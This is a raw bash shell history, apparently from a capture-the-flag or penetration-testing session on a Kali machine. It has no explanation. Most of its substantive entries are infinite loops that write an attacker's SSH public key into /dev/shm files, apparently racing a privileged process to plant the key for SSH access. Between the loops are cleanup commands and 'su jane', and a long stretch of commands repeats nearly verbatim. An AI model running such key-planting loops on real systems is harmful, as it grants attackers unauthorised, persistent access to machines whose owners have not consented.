 1069  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/keys* > /dev/null; done
 1070  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/keys/id_rsa.pub* > /dev/null; done
 1071  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/keys* > /dev/null; done
 1072  ls -la 
 1073  cd keys/
 1074  ls -la 
 1075  cat id_rsa.pub\* 
 1076  clear
 1077  ls a- l
 1078  clear
 1079  ls -la 
 1080  cat id_rsa.pub\* 
 1081  cd..
 1082  cd ..
 1083  clear
 1084  ls -la 
 1085  cd l
 1086  cd keys/
 1087  ls -la 
 1088  rm -r id_rsa.pub\* 
 1089  clear
 1090  ls -la 
 1091  cd ..
 1092  ls -a l
 1093  rm -r keys/
 1094  clear
 1095  ls -al 
 1096  ls -la 
 1097  cd ..
 1098  cd shm/
 1099  ls -la 
 1100  su jane
 1101  clear
 1102  ls -]al 
 1103  clear
 1104  ls -la 
 1105  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm* > /dev/null; done
 1106  clear
 1107  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/id_rsa.pub > /dev/null; done
 1108  clear
 1109  ls -la 
 1110  rm -r id_rsa.pub 
 1111  clear
 1112  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/id_rsa.pub > /dev/null; done
 1113  ls -al 
 1114  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/keys/id_rsa.pub* > /dev/null; done
 1115  cd /dev/shm/
 1116  ls -al 
 1117  cd keys/
 1118  ls 
 1119  touch file.txt
 1120  cd ..
 1121  cd /tmp/
 1122  cd t
 1123  cd test/
 1124  touch file.txt
 1125  cd ..
 1126  touch file.txt
 1127  rm -r 
 1128  rm -r file.txt 
 1129  cd t
 1130  cd test/
 1131  ls -al 
 1132  touch file.txt
 1133  cd /dev/shm/
 1134  ls -la 
 1135  cd keys/
 1136  ls 
 1137  cd..
 1138  clear
 1139  ls -al 
 1140  cd ..
 1141  ls -la 
 1142  rm -r keys/
 1143  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/keys* > /dev/null; done
 1144  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/keys/id_rsa.pub* > /dev/null; done
 1145  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/keys/id_rsa.pub > /dev/null; done
 1146  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/keys* > /dev/null; done
 1147  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/keys/id_rsa.pub* > /dev/null; done
 1148  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/keys* > /dev/null; done
 1149  ls -la 
 1150  cd keys/
 1151  ls -la 
 1152  cat id_rsa.pub\* 
 1153  clear
 1154  ls a- l
 1155  clear
 1156  ls -la 
 1157  cat id_rsa.pub\* 
 1158  cd..
 1159  cd ..
 1160  clear
 1161  ls -la 
 1162  cd l
 1163  cd keys/
 1164  ls -la 
 1165  rm -r id_rsa.pub\* 
 1166  clear
 1167  ls -la 
 1168  cd ..
 1169  ls -a l
 1170  rm -r keys/
 1171  clear
 1172  ls -al 
 1173  ls -la 
 1174  cd ..
 1175  cd shm/
 1176  ls -la 
 1177  su jane
 1178  clear
 1179  ls -]al 
 1180  clear
 1181  ls -la 
 1182  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm* > /dev/null; done
 1183  clear
 1184  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/id_rsa.pub > /dev/null; done
 1185  clear
 1186  ls -la 
 1187  rm -r id_rsa.pub 
 1188  clear
 1189  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/id_rsa.pub > /dev/null; done
 1190  ls -al 
 1191  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/keys/id_rsa.pub* > /dev/null; done
 1192  cd /dev/shm/
 1193  ls -al 
 1194  cd keys/
 1195  ls 
 1196  touch file.txt
 1197  cd ..
 1198  cd /tmp/
 1199  cd t
 1200  cd test/
 1201  touch file.txt
 1202  cd ..
 1203  touch file.txt
 1204  rm -r 
 1205  rm -r file.txt 
 1206  cd t
 1207  cd test/
 1208  ls -al 
 1209  touch file.txt
 1210  cd /dev/shm/
 1211  ls -la 
 1212  cd keys/
 1213  ls 
 1214  cd..
 1215  clear
 1216  ls -al 
 1217  cd ..
 1218  ls -la 
 1219  rm -r keys/
 1220  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/keys* > /dev/null; done
 1221  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/keys/id_rsa.pub* > /dev/null; done
 1222  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/keys/id_rsa.pub > /dev/null; done
 1223  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/keys* > /dev/null; done
 1224  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/keys/id_rsa.pub* > /dev/null; done
 1225  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/keys* > /dev/null; done
 1226  ls -la 
 1227  cd keys/
 1228  ls -la 
 1229  cat id_rsa.pub\* 
 1230  clear
 1231  ls a- l
 1232  clear
 1233  ls -la 
 1234  cat id_rsa.pub\* 
 1235  cd..
 1236  cd ..
 1237  clear
 1238  ls -la 
 1239  cd l
 1240  cd keys/
 1241  ls -la 
 1242  rm -r id_rsa.pub\* 
 1243  clear
 1244  ls -la 
 1245  cd ..
 1246  ls -a l
 1247  rm -r keys/
 1248  clear
 1249  ls -al 
 1250  ls -la 
 1251  cd ..
 1252  cd shm/
 1253  ls -la 
 1254  su jane
 1255  clear
 1256  ls -]al 
 1257  clear
 1258  ls -la 
